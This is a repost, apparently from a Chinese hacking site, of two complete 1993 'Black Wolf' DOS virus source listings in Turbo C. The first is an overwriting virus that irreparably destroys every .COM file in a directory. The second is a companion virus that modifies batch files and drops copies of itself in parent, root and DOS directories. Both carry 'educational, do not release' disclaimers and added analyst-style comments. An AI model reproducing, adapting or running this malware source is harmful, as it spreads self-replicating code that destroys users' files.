Copied from 黑基.
- - ------------------ Cut Here -------------------------- - -
/* This is a simple overwriting virus programmed in Turbo C */
/* It will infect all .COM files in the current directory */
/* Infections destroy the programs and cannot be cured */
/* It was presented in Virology 101 (c) 1993 Black Wolf */
/* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */
#include
#include
#include
/* Stream handles: Virus is opened on the running program's own file
   (_argv[0]), Host on each matched .COM file. */
FILE *Virus,*Host;
/* x counts the bytes still to be copied; done holds the findfirst/findnext
   result; y is not used anywhere in this listing. */
int x,y,done;
/* Transfer buffer; data is moved through it 256 bytes at a time. */
char buff[256];
/* Directory-search state shared by findfirst and findnext; ff_name is the
   name of the file that matched. */
struct ffblk ffblk;
/*
 * Entry point of the overwriting sample described in the header comment.
 *
 * For every file matching *.COM in the current directory, the first 9504
 * bytes of that file are replaced with bytes read from the running
 * program's own file (_argv[0]). Nothing from the overwritten region is
 * saved anywhere, which is why the header says infections cannot be cured:
 * recovery means restoring the affected files from a known-good copy.
 *
 * Analyst notes (all taken from this listing):
 *  - scope is the current directory only; no chdir and no path prefix is used;
 *  - one line "Infecting <name>" is printed for each matched file;
 *  - each host is opened "rb+", i.e. updated in place from offset 0, so a
 *    host longer than 9504 bytes keeps its old tail after the new prefix;
 *  - provided the sample's own file is at least 9504 bytes long, every
 *    affected file begins with the same bytes as the sample, which gives a
 *    simple content comparison for triage.
 *
 * Returns 0 once findfirst/findnext report no further match.
 */
main()
{
    done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
    while (!done) /* Loop for all COM's in DIR */
    {
        printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
        Virus=fopen(_argv[0],"rb"); /* Open infected file (the running program) */
        Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file for in-place update */
        x=9504; /* Virus size - must be correct for the compiler it is made
                   on, otherwise the entire virus may not be copied!! */
        while (x>256) /* OVERWRITE new Host */
        { /* Read/Write 256 byte chunks until bytes left <= 256 */
            fread(buff,256,1,Virus);
            fwrite(buff,256,1,Host);
            x-=256;
        }
        fread(buff,x,1,Virus); /* Finish off copy with the remaining x bytes */
        fwrite(buff,x,1,Host);
        fcloseall(); /* Close both files and */
        done = findnext(&ffblk); /* go for another one. */
    }
    /* Activation would go here (none is present in this listing) */
    return (0); /* Terminate */
}
- - ------------------ Cut Here --------------------------- - -
此程序没有给出部分函数的具体实现，但整体思路非常清楚。
1 - - - -----------------Start Code------------------------- - - -
2 /* This file is a high-level language virus of a different sort.
3 It will search out batch files and, when found, place a copy
4 of itself in the directory with the batch file while adding
5 instructions in the BAT to execute this new file. In this way,
6 it will spread each time an "infected" batch is run.
7 Disinfection is done simply by deleting all of the BAT&COM.COM
8 files and removing the commands from batch files that ruin
9 them. This one is NOT confined to the current directory,
10 so make sure it is on an isolated machine and be sure to
11 clean up any infections. PLEASE DO NOT RELEASE!
12 BAT&COM virus is (C) 1993 Black Wolf Enterprises.
13 */
14 #include
15 #include
16 #include
17 #include
/* Directory-search state shared by every findfirst/findnext call in this
   file; ff_name holds the name of the most recent match. */
struct ffblk ffblk;
/*
 * Entry point: records the current directory, lets Pick_A_Dir change to
 * another directory, runs Infect_Directory there, then changes back.
 *
 * Analyst note: because the working directory is changed before any file
 * is touched, the modified batch files and the dropped BAT&COM.COM are
 * found in the directory Pick_A_Dir settled on, not in the directory the
 * program was started from. Always returns 0.
 */
main()
{
    char old_dir[MAXPATH];
    Get_Path(old_dir);     /* Save the old directory */
    Pick_A_Dir();          /* Find a new directory to */
    Infect_Directory();    /* infect and infect it. */
    chdir(old_dir);        /* Return to old directory */
    return 0;
}
/*
 * Chooses the working directory for the rest of the run.
 *
 * Order tried: the parent of the current directory, then the root of the
 * current drive, then \DOS\. The first of the parent or the root that
 * contains at least one *.BAT file is kept; \DOS\ is entered without a
 * further check. Always returns 0.
 *
 * Cleanup guidance that follows from this order: check the parent of the
 * launch directory, the drive root and \DOS for the artifacts named in the
 * header comment.
 */
Pick_A_Dir()
{
    int done;
    chdir("..");                          /* First, go out a DIR. */
    done=findfirst("*.BAT",&ffblk,0);     /* If no BAT files, try */
                                          /* root and DOS */
    if (done)
    {
        chdir("\\");
        done=findfirst("*.BAT",&ffblk,0);
        if (done) chdir("\\DOS\\");
    }
    return 0;
}
/*
 * Processes the current directory: calls Do_Batch once for each *.BAT file
 * found, then calls Copy_Virus if no file named BAT&COM.COM exists there
 * (findfirst returning non-zero means no match). Always returns 0.
 *
 * Indicators visible here: a file named BAT&COM.COM next to batch files,
 * plus whatever Do_Batch appends to those batch files.
 */
Infect_Directory()
{
    int done;
    done = findfirst("*.BAT",&ffblk,0);
    while (!done)                   /* Find all .BAT files */
    {                               /* and add code to run */
        Do_Batch();                 /* BAT&COM if not */
        done = findnext(&ffblk);    /* already there */
    }
    if (findfirst("BAT&COM.COM",&ffblk,0))    /* If BAT&COM does */
    {Copy_Virus();}                           /* not exist, then */
    return 0;                                 /* copy it into dir. */
}
/*
 * Handles the batch file currently named in ffblk.ff_name.
 *
 * The last 11 bytes of the file are read and compared with the string
 * "BAT&COM.COM". If they differ, one line of the form
 * "<current path>\BAT&COM.COM" is appended to the end of the file; if they
 * match, the file is left as it is. Always returns 0.
 *
 * Analyst notes:
 *  - the marker test looks only at the final 11 bytes, so a batch file
 *    counts as already modified only when that string is the very end of
 *    the file;
 *  - the indicator to search for during cleanup is a trailing line ending
 *    in \BAT&COM.COM; the header comment states that removing these lines
 *    and deleting the BAT&COM.COM files disinfects the system.
 */
Do_Batch()
{
    FILE *batch;
    char Infection_Buffer[12];       /* 11 marker bytes plus the terminator */
    char vpath[MAXPATH];
    Get_Path(vpath);                 /* Get path for adding path */
                                     /* specifier in commands */
    if (vpath[3]==0) vpath[2]=0;     /* Keep path good in root: "X:\" becomes "X:" */
    batch=fopen(ffblk.ff_name, "rt+");
    fseek(batch, -11, SEEK_END);     /* Position on the last 11 bytes */
    fread(Infection_Buffer,11,1,batch);
    Infection_Buffer[11]=0;          /* Terminate string */
    if (strcmp(Infection_Buffer,"BAT&COM.COM"))    /* Check if batch is */
    {                                              /* infected. */
        fseek(batch, 0, SEEK_END);
        fprintf(batch,"\n%s\\BAT&COM.COM",vpath);  /* Add command to batch */
    }
    fclose(batch);
    return 0;
}
/*
 * Copies the running program's own file (_argv[0]) to a new file named
 * BAT&COM.COM in the current directory, reading up to 1024 bytes at a time
 * and stopping after the first read that returns fewer than 1024 bytes.
 * Always returns 0.
 *
 * Analyst note: the bytes are written exactly as read, so in this listing
 * each dropped BAT&COM.COM should have the same content as the file it was
 * copied from; one content hash therefore identifies the other copies.
 */
Copy_Virus()
{
    FILE *old_virus, *new_virus;
    int write_length;
    char copy_buffer[1024];          /* Copy the virus to */
                                     /* new directory */
    old_virus=fopen(_argv[0],"rb");
    new_virus=fopen("BAT&COM.COM","wb");
    write_length=1024;               /* Primes the loop condition below */
    while (write_length==1024)
    {
        write_length=fread(copy_buffer,1,1024,old_virus);
        fwrite(copy_buffer,write_length,1,new_virus);
    }
    fclose(old_virus);
    fclose(new_virus);
    return 0;
}
/*
 * Writes the current drive and directory into path as "X:\<directory>".
 *
 * path: caller-supplied buffer; both callers in this file pass a
 *       char[MAXPATH] array.
 * The string is seeded with "A:\", the drive letter is replaced by
 * 'A' + getdisk(), and getcurdir() fills in the part after the backslash.
 * The result is delivered through path; the return value is always 0.
 */
Get_Path(char *path)
{
    strcpy(path, "A:\\");
    path[0] ='A' + getdisk();    /* Drive letter of the current drive */
    getcurdir(0, path+3);        /* Current directory goes after "X:\" */
    return 0;
}
101 - - - -----------------End of Code-----------------